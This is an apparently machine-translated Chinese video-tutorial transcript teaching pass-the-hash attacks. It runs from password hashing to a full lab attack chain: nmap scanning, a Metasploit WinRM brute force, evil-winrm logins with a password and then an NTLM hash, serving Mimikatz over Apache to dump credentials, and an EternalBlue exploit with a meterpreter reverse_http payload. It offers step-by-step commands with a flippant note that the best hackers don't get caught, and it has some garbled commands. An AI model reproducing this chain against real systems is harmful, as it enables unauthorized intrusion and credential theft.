密码破译新纪元：无需密码，我就能登陆你的账户？！

相关阅读

视频讲解

🔥🔒「无需密码，就能黑客攻击？」👀 是的，你没听错！在我们即将展现的视频中，你将领略到一种震撼人心的技术，它有可能完全改变你对密码的认知。💡 现在想象一下，你能无需知道密码，就直接登陆用户账户，感觉疯狂吗？这正是我们将要揭示的秘密。

在这场惊心动魄的科技冒险中，我们首先会深入探讨密码的本质和作用。🤔然后，你将跟随我们，穿梭在计算机和网站的世界，了解到用户名和密码如何被存储在后台，以及计算机是如何通过比对数据库中的信息来确认用户身份的。😱 你会了解到密码其实就是你独有的秘密，只有你（或你愿意分享的人）才能知道。

但这还不是全部，我们还将揭示一个惊人的事实：密码可能以纯文本的形式被存储，也就是说，如果我是一个数据库管理员，我甚至能看到你的密码！😵 不过现在的计算机，通常会通过一种叫做“哈希”的算法，将你的密码转化成一个特殊的值，然后将这个值存储在后台。🔮

最后，我们会带你了解一种名为“传递哈希值”的攻击方式。这种方式是如何使我们得以不用知道密码，只需知道密码的哈希值，就能获得凭证访问权。🎩 现在，就让我们一同揭开这份密码的神秘面纱，探索黑客世界的深渊吧！🚀

图文讲解

没有密码的黑客攻击。这不是令人震惊吗？

所以我们可以从字面上登录到一个用户账户，甚至不知道他们的密码。而这是疯狂的。所以，我们需要做的第一件事是了解什么是密码的用途。如果我们甚至不知道密码的用途是什么、那么这个教程就根本无法进行下去了。首先，你可能有一个网站，或者甚至可能是一台电脑，不管情况如何。所以通常你要做的是提供用户名，以及密码字段，以确定你是谁。幕后发生的事情是，当你第一次注册时，你的用户名和密码，它被存储在计算机的后台，或当然在网站，无论情况如何。因此，计算机随后将做的是检查数据库中，在存储库中，他们能够有完全相同的用户以及密码的匹配。

因此，在这种情况下，密码成为只有你知道的秘密，或你决定与之分享密码的人。而在很久很久以前，或者事实上，不久以前，事实上，有时这些网站或应用程序，计算机，他们实际上存储你的密码可能在纯文本，这意味着，如果我是一个数据库管理员，我想能够登录并看到你的密码，我可以做到这一点。

所以，相反，发生的情况是，你的密码通过进入一个数学算法，这产生了一个哈希值。

这个哈希值然后被使用并存储在后台因此，任何时候用户都要继续提供密码字段，密码会通过相同的算法，然后产生哈希值。

并且哈希值被检查回来与所有这些不同的密码的数据库。

这意味着，如果HackerLoi先生设法进入后台数据库，并且他能够查看所有这些不同的密码字段并且所有这些哈希值，

他实际上无法知道你的密码。

但实际上，这是最疯狂的部分、因为你甚至不需要知道密码。为了获得对凭证的访问，你现在需要的就是哈希值。而这种攻击被称为传递哈希值(PASS THE HASH)。

所以，当HackerLoi先生要获得一个登录字段的访问权或被呈现在一个网站或计算机的登录页面，因此，而不是提供密码，HackerLoi先生现在可以做的是继续前进，并提供哈希值到密码字段，并在计算机上发送它，导致进入该特定凭证。

记住孩子们，黑客攻击是非法的。如果你因为黑客入侵被抓，请不要告诉他们你知道谁是HackerLoi先生。而且他们还告诉我，最好的黑客不会被抓。而你通常做的第一件事，一旦我们在Kali Linux上，这是一个道德黑客操作系统，不是一个黑客操作系统，是，我们将扫描计算机，我们将扫描网站，看看有哪些服务是开放的，以便我们尝试去定位。在这种情况下，让我们说我要使用nmap，我将针对一个特定的端口。在这种情况下，nmap -p后面是5985。然后我有IP地址。好的。因此，我当然想知道服务版本。所以192.168.0.185。好的。所以在你的案例中，它可能是说loiliangyang.com。你对它做一个扫描，然后你能够发现，好的，有具体的服务是开放的。

如果它们是开放的，也许我们可以尝试针对它。好的。而你想的第一步是，嘿，让我们进行暴力破解攻击。但暴力破解攻击的问题在于它非常嘈杂。比如，我们继续发起暴力破解攻击。我们看到，是的，我们有一个开放的服务，并且我们能够通过提供一堆用户名和密码来对其进行攻击。

所以让我们继续前进，并尝试这样做。所以要做的是继续前进，输入

sudo msfconsole

来启动我们的matasploit。

我们在这里做的是看我们可以提供一个用户名，密码的列表，看看哪一个匹配。而且所有的时间可能是尝试数以千计的用户名和密码组合，然后查看哪个实际上给了我们匹配结果，这本身就是一个潜在的问题。所以我们可以做的是搜索，比如，WinRM，这就是Windows远程管理。

search winrm

好的。所以5985端口对Windows远程管理是开放的。所以我们现在可以做的是，你可以看到，有几个模块供我们使用。所以在这种情况下，我们可以使用数字选项三，即辅助扫描器WinRM，WinRM登录。所以我们去输入use 3，对吗？

use 3

输入show options

设置RHOSTS为192.168.0.185。

SET RHOSTS 192.168.0.185

好的。现在我们需要设置密码文件以及用户文件。所以我们输入set USER_FILE。好的。然后紧接着，在这种情况下，我们可以使用/usr/share/wordlist，然后紧接着，比如说，commonusernames.txt。

set USER_FILE /usr/share/wordlists/commonusernames.txt

好的。而下一个我们可以输入set PASS_FILE。

好的。而在这种情况下，usr/share/wordlist/commonpasswords.txt在上面点击回车。

set PASS_FILE /usr/share/wordlists/commonpasswords.txt

一旦我们准备好了，好了。那么，也许我想设置的另一个问题是STOP_ON_SUCCESS。所以，如果我们得到一个匹配的凭证、那么我们就立即停止攻击。好的。所以我们可以做的是继续前进，输入 set STOP_ON_SUCCESS好的。在这种情况下，输入true。

set STOP_ON_SUCCESS TRUE

好了。所以搞定了。所以继续前进，三、二、一输入 exploit点击回车。

砰。你就在这里得到它。好的。登录成功。我们得到了Loiliangyang和一个密码12345678。

当然，在这之前还有其他几次尝试。好的。所以在这种情况下，我们有Loiliangyang:123456，以及密码Loiliangyang:password。所以这两个都没有成功。但那一个，第三次尝试成功了。好的。因此，再次，在现实世界中，你会尝试数十万使用这个密码组合。而最终，这是很嘈杂的。因为在幕后，有一个安全监控系统捕捉到所有这些认证尝试。然后把它标记出来。

之后，你的IP地址会被封锁。然后你会被逮捕。你去坐牢。

所以，相反，我们要考虑，好吧，如果我们有访问的计算机通过利用或我们的物理访问计算机，

或其他手段获得的哈希值，我们早些时候向您展示，那么，这将使我们能够立即将该值传递给登录者，使我们能够访问整个系统。例如，现在我们已经得到了正确的用户名和密码，我们可以做的是轻松地使用WinRM或Windows远程管理，并输入-i与目标IP地址192.168.0.185。当然，在这种情况下，用户名为Loiliangyang，后面是-p 密码为12345678，我们可以输入这个我们就可以进入电脑了。

evil-winrm -i 192.168.0.185 -u loiliangyang -p 12345678

好的。所以这是攻击的一种方式。另一种方法是使用像Mimikatz这样的工具，它允许我们从系统中转出哈希值。所以在这种情况下，我可以cd到/var/www/html。输入ls或ls。也许我会继续前进，查找Mimikatz。你可以看到在这里我们有Mimikatz.exe。

所以这就是我们希望电脑下载的那个。而且它可以通过很多不同的渠道传递，对吧？所以它可能是通过一个漏洞。它可能是通过一个钓鱼邮件，或者可以直接通过控制台的访问。你从那里下载它。并且允许我们在这上面执行。然后让我们看到所有这些哈希值，我们可以提供作为在系统中获得访问的一部分。所以现在我可以让它打开运行。所以我可以输入

sudo systemctl start apache2.service

所以我们正在打开HTTP服务。这允许用户下载Mimikatz.exe的文件。现在我在目标Windows电脑上。而我在这里可以做的是，继续输入Kali Linux机器的IP地址所以在这种情况下，192.168.0.105，后面是Mimikatz.exe。点击回车。所以现在我们正在下载文件。

好的，所以一旦我们下载了文件，我们就可以保存它。从那以后，我们就可以直接执行到文件上了。好的，所以在这种情况下，IP地址是192.168.0.106。

所以让我们回到目标计算机上，把它改为106。好的，点击回车，Mimikatz。

好的，进去保存文件。那么现在文件已经被保存了。它被保存到下载文件夹中。

好的，所以我之前已经下载了另一份Mimikatz的副本。好的，所以我们可以继续执行它。所以现在我这里的是一个管理员模式的命令提示符。所以，如果你以有限制的用户身份运行此命令，你将不得不考虑权限提升，或找到其他方法来倾倒这些哈希值。所以在这种情况下，我已经有了一个提升的权限。好的，所以我可以做的是继续启动Mimikatz.exe。好的，然后继续按回车键，完成。

所以我们现在可以做的是继续前进，把所有这些不同的用户以及哈希值倒出来。所以在这种情况下，我输入

sekurlsa::logonPasswords full

点击回车，我们可以看到以下结果。

哦，好的，所以我现在需要做的是输入

privilledge::debug

然后再按照同样的命令。

按回车键就可以了。

嘭，完成。

如果我一路向上滚动到顶部，我可以在这里看到以下结果。

所以，我们有loyliangyang的用户名，以及ntlm的哈希值。

在这种情况下，它是2597。

使用这个值回传到恶意的Windows远程管理，或者只使用哈希值，这样我们就能获得进入系统的权限。所以跳回到Kali Linux，我现在可以做的是继续前进，在这个上面输入退出。所以我将改变一下这个。好的，加上-h，后面是哈希值。

evil-winrm -i 192.168.0.185 -u loiliangyang -H 259745cb123a52aa2e693aaacca2db52

然后3、2、1，按回车键。嘭，我们又一次进入了。

好的，这样我们就可以通过拥有哈希值来访问系统，而不需要知道背后的密码。这是很好的，因为我们甚至不需要知道实际的密码来获得对系统的访问。

正如我所说，为了发现运行的那些服务，你需要先扫描一台电脑。当然，在这种情况下，我们总是可以搜索可能的漏洞利用，基于我们可以针对的那些开放服务。所以在这种情况下，我可以做一个简单的搜索，例如，像EternalBlue。

search eternal

而我们在这里可以看到的是我们有几个选择。也许我们可以使用扫描器选项。所以我可以输入use 3，我们可以输入show options。

而且我可以把rhost设置为192.168.0.185。所以这是目标计算机。

set RHOSTS 192.168.0.185

在上面点击回车。一旦我们有了这个，我们就可以继续前进，输入exploit。

它指出以下主机可能对MS17010易受攻击。所以，如果它是易受攻击的，我们可以继续通过在其上运行一个利用工具来攻击它。所以，如果我继续前进，再次输入搜索eternal。现在在这种情况下，我可以输入use 1，这是该利用模块。

一旦我们有了这个，我可以输入show options。

好的。所以在这种情况下，我们可以把RHOST设置为192.168.0.185。

set RHOSTS 192.168.0.185

好的。也许我可以改变一下LPORT。所以到1234。

set LPORT 1234

我现在可以做的是，我可以向上滚动一下，看看还有哪些其他的选项，我们需要直接放入。好的。所以我们有rhost，好的，这是必须的。还有我们的rport。好的。以此类推。一旦你有了这个，我也可以稍微改变一下有效载荷。所以输入设置有效载荷Windows/x64。在这种情况下，继续输入/meterpreter/reverse_http。

set payload windows/x64/meterpreter/reverse_http

然后我们可以输入show options。

所以要看一切都设置好了。所以一旦你有了这个，就去输入exploit。

这样我们就可以进入系统了。一旦我们有了进入系统的权限，我们就可以输入，比如，shell。

然后从shell，我可以输入whoami。

现在我们在这台目标计算机中以升高的权限运行。所以，我可以输入cd ..，cd ..。

而且我知道文件的确切位置。所以我可以输入cd Users，输入cd loiliangyang或者在这种情况下，也可以cd Downloads。

而一旦我们在这里，同样的事情。我可以cd，不，不是cd，而是通过输入mimikatz.exe来执行该文件。

所以我可以直接从Metasploit或其他地方上传这个。一旦我们在这里，我可以输入以下内容

privilege::debug

然后我们可以做同样的事情，以这种方式倾倒出所有的哈希值。所以以这种方式，我在上面点击了回车。然后同样的事情。我们是否能够得到哈希值？

所以，如果我再滑动一下，我可以看到下面的信息。好的。因此，在这种情况下，loiliangyang，当然，NTLM哈希值为2597，等等，等等。

好的。所以再说一遍，有许多不同的选择，渠道让你获得对计算机的访问。好的。所以这可能是真的，就像我说的，钓鱼邮件。如果你不知道怎么做，可以直接在这个频道上查看。所以请继续订阅。看完所有的视频，这样你就不会被黑了。好的。也要打开通知。